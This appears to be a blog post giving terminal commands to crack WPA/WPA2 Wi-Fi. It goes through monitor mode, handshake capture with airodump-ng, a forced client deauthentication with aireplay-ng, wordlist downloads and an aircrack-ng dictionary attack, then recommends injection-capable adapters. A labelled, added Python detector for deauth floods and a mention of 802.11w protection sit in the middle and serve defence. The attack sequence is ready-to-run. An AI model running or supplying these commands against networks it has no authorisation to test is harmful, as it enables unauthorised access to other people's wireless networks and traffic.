Terminal Commands for WPA/WPA2 wireless cracking:
airmon-ng
airmon-ng start wlan0
airodump-ng mon0
Press Ctrl+Z to break out of ‘airodump-ng’ once you have noted the target access point’s BSSID and channel number (CH).
airmon-ng stop mon0
airmon-ng start wlan0 10
airodump-ng -c 10 --bssid 00:11:50:61:18:72 -w wpadeauth mon0
(airodump-ng treats -w as a file prefix and appends -01.cap itself, so the capture lands in wpadeauth-01.cap, the file aircrack-ng reads below.)
Wait and collect the WPA/WPA2 handshake when a device with the known key connects to the wireless network. Or, if someone is already on the network, you can use aireplay-ng, which “sends disassociate packets to one or more clients which are currently associated with a particular access point.”[1]
aireplay-ng
aireplay-ng -0 3 -a 00:11:50:61:18:72 -c 58:55:CA:96:EE:84 mon0
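The deauthentication step above is exactly the pattern a wireless IDS looks for: a burst of deauth/disassoc management frames aimed at one client (or at the broadcast address) from the AP’s own address. The script below is an added illustration of that detection logic; it is not code from the original post or from the aircrack-ng project. The frame records are constructed here (a real deployment would feed them from a monitor-mode capture), and the tuple layout, the 2-second window and the threshold of 5 frames are assumptions you would tune to your environment. The real mitigation is 802.11w Protected Management Frames, which authenticate deauth and disassoc frames so forged ones are dropped.

```python
"""Deauthentication-flood detector over constructed 802.11 management-frame records.

Added example, not from the original post or the aircrack-ng project. The record
format (time_seconds, subtype, src, dst, bssid) is an assumption; in practice you
would decode these fields from a monitor-mode capture.
"""
from collections import defaultdict, deque

# Management-frame subtypes that tear down a client's association.
DISCONNECT_SUBTYPES = {"deauth", "disassoc"}

# Constructed sample traffic: normal beacons/probes, one isolated deauth (benign,
# e.g. an idle timeout), then a burst of five deauths to a single client.
# The MAC addresses are the ones used in the commands on this page.
SAMPLE_FRAMES = [
    # (time_seconds, subtype, src, dst, bssid)
    (0.00, "beacon", "00:11:50:61:18:72", "ff:ff:ff:ff:ff:ff", "00:11:50:61:18:72"),
    (0.50, "probe", "58:55:ca:96:ee:84", "ff:ff:ff:ff:ff:ff", "00:11:50:61:18:72"),
    (1.00, "deauth", "00:11:50:61:18:72", "58:55:ca:96:ee:84", "00:11:50:61:18:72"),
    (30.0, "beacon", "00:11:50:61:18:72", "ff:ff:ff:ff:ff:ff", "00:11:50:61:18:72"),
    (60.00, "deauth", "00:11:50:61:18:72", "58:55:ca:96:ee:84", "00:11:50:61:18:72"),
    (60.01, "deauth", "00:11:50:61:18:72", "58:55:ca:96:ee:84", "00:11:50:61:18:72"),
    (60.02, "deauth", "00:11:50:61:18:72", "58:55:ca:96:ee:84", "00:11:50:61:18:72"),
    (60.03, "deauth", "00:11:50:61:18:72", "58:55:ca:96:ee:84", "00:11:50:61:18:72"),
    (60.04, "deauth", "00:11:50:61:18:72", "58:55:ca:96:ee:84", "00:11:50:61:18:72"),
    (60.05, "deauth", "00:11:50:61:18:72", "58:55:ca:96:ee:84", "00:11:50:61:18:72"),
    (61.00, "beacon", "00:11:50:61:18:72", "ff:ff:ff:ff:ff:ff", "00:11:50:61:18:72"),
]


def detect_deauth_floods(frames, window_seconds=2.0, threshold=5):
    """Return one alert per (src, dst) pair that sends `threshold` or more
    disconnect frames inside any sliding window of `window_seconds`.

    Each alert is a dict with src, dst, count, first and last timestamps.
    Frames are processed in time order; a pair alerts once per run so a long
    flood does not produce one alert per frame.
    """
    recent = defaultdict(deque)  # (src, dst) -> timestamps still inside the window
    alerts = []
    alerted = set()
    for ts, subtype, src, dst, _bssid in sorted(frames, key=lambda f: f[0]):
        if subtype not in DISCONNECT_SUBTYPES:
            continue
        key = (src, dst)
        window = recent[key]
        window.append(ts)
        # Drop timestamps that have aged out of the window.
        while window and ts - window[0] > window_seconds:
            window.popleft()
        if len(window) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append({
                "src": src,
                "dst": dst,
                "count": len(window),
                "first": window[0],
                "last": ts,
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_deauth_floods(SAMPLE_FRAMES):
        target = "broadcast" if alert["dst"] == "ff:ff:ff:ff:ff:ff" else alert["dst"]
        print(f"deauth flood: {alert['count']} frames from {alert['src']} to {target} "
              f"between t={alert['first']} and t={alert['last']}")
```

The single deauth at t=1.0 never trips the threshold, while the burst at t=60 alerts on the fifth frame; a burst aimed at ff:ff:ff:ff:ff:ff is caught by the same logic because the broadcast address is just another dst key. For a live sensor you would add a cooldown so a pair can re-alert after the first burst ends, and whitelist your own APs' scheduled disconnects.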
Now that you have the WPA/WPA2 handshake, let’s crack it!
wget http://www.alexrams.com/blog/wp-content/uploads/2014/09/darkc0de.lst.gz
gunzip darkc0de.lst.gz
aircrack-ng -w darkc0de.lst -b 00:11:50:61:18:72 wpadeauth-01.cap
wget http://www.alexrams.com/blog/wp-content/uploads/2014/09/rockyou.7z
7z x rockyou.7z
Recommended cards for wireless injection with BackTrack and/or Kali:
- Alfa AWUS036H (Highly recommended and has better range)
- Alfa AWUS036NHA (Also great, less range but faster wifi connection)
[1] http://www.aircrack-ng.org/doku.php?id=deauthentication